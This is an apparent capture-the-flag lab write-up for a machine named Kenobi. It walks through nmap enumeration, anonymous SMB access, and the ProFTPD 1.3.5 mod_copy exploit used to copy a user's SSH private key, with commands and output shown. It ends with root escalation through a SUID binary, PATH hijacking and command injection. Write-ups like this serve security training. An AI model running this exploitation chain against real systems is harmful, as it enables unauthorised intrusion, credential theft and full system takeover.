KENOBI

NMAP SCAN:

nmap -sC -sV -Pn -oN kenobi_2 10.10.38.206

RESULT:

# Nmap 7.91 scan initiated Tue Apr 20 20:10:24 2021 as: nmap -sC -sV -Pn -oN kenobi_2 10.10.38.206
Nmap scan report for 10.10.38.206
Host is up (0.20s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE     VERSION
21/tcp   open     ftp         ProFTPD 1.3.5
22/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp   open     http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      33807/tcp   mountd
|   100005  1,2,3      36702/udp   mountd
|   100005  1,2,3      47128/udp6  mountd
|   100005  1,2,3      53539/tcp6  mountd
|   100021  1,3,4      33375/tcp6  nlockmgr
|   100021  1,3,4      39481/tcp   nlockmgr
|   100021  1,3,4      47700/udp6  nlockmgr
|   100021  1,3,4      59691/udp   nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open     nfs_acl     2-3 (RPC #100227)
5678/tcp filtered rrac
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m25s, deviation: 2h53m12s, median: 25s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-04-20T09:41:28-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-20T14:41:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .



NEXT SCAN : TO ENEMURATE SHARES

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.70.13


Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 16:21 IST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.70.13
Host is up (0.18s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.70.13\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.70.13\anonymous: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.70.13\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 28.54 seconds


NOW NEXT CONNECT USING SMBCLIENT:

smbclient //10.10.70.13/anonymous

NO PASSWORD NEEDED JUST ENTER ,THEN U CAN LIST THE FILES USING ls.

NEXT WE CAN DOWN LOAD THE FILE USING THE COMMAND :

smbget -R smb://10.10.70.13/anonymous


NEXT WE SCAN TO LIST THE MOUNT POINT:


nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.70.13

RESULT :

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 16:27 IST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 40.00% done; ETC: 16:27 (0:00:00 remaining)
Nmap scan report for 10.10.70.13
Host is up (0.18s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds

THIS SHOW THE DIRECTORY VAR MOUNTED

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

You should have found an exploit from ProFtpd's mod_copy module. 

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.


nc 10.10.70.13 21                                                                                                                                          
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.70.13]                                                                                                                       
SITE CPFR /home/kenobi/.ssh/id_rsa                                                                                                                                                          
350 File or directory exists, ready for destination name                                                                                                                                    
SITE CPTO /var/tmp/id_rsa                                                                                                                                                                   
250 Copy successful


So we've now moved Kenobi's private key to the /var/tmp directory

Lets mount the /var/tmp directory to our machine

mkdir /mnt/kenobiNFS
mount 10.10.70.13:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS


COPY ID_RSA :
cp ./id_rsa ~/tryhackme/kenobi/

SSH INTO SERVER:

ssh -i id_rsa kenobi@10.10.70.13

NOW SEARCH FILE WITH SETUID SET:

 find / -perm -u=s -type f 2>/dev/null

 WE FIND  A CUSTOM FILE WITH SETUID BIT SET /usr/bin/menu

 WHICH GIVES THREE OPTIONS:


 menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Wed, 21 Apr 2021 13:04:39 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html

kenobi@kenobi:/$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2;ls
4.8.0-58-generic
kenobi@kenobi:/$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
eth0      Link encap:Ethernet  HWaddr 02:c1:c3:65:3f:e5  
          inet addr:10.10.246.114  Bcast:10.10.255.255  Mask:255.255.0.0
          inet6 addr: fe80::c1:c3ff:fe65:3fe5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:9001  Metric:1
          RX packets:990 errors:0 dropped:0 overruns:0 frame:0
          TX packets:818 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:75597 (75.5 KB)  TX bytes:101082 (101.0 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:194 errors:0 dropped:0 overruns:0 frame:0
          TX packets:194 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:14837 (14.8 KB)  TX bytes:14837 (14.8 KB)

IF WE RUN THE COMMAND STRINGS :

strings menu

WE FIND 3 COMMANDS:

curl -I localhost
uname -r
ifconfig


This shows us the binary is running without a full path (e.g. not using /usr/bin/curl or /usr/bin/uname).

As this file runs as the root users privileges, we can manipulate our path gain a root shell.

echo /bin/bash > curl

chmod 777 curl

export PATH=/home/kenobi/:$PATH

kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:~# whoami
root

We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the "curl" binary.. Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!


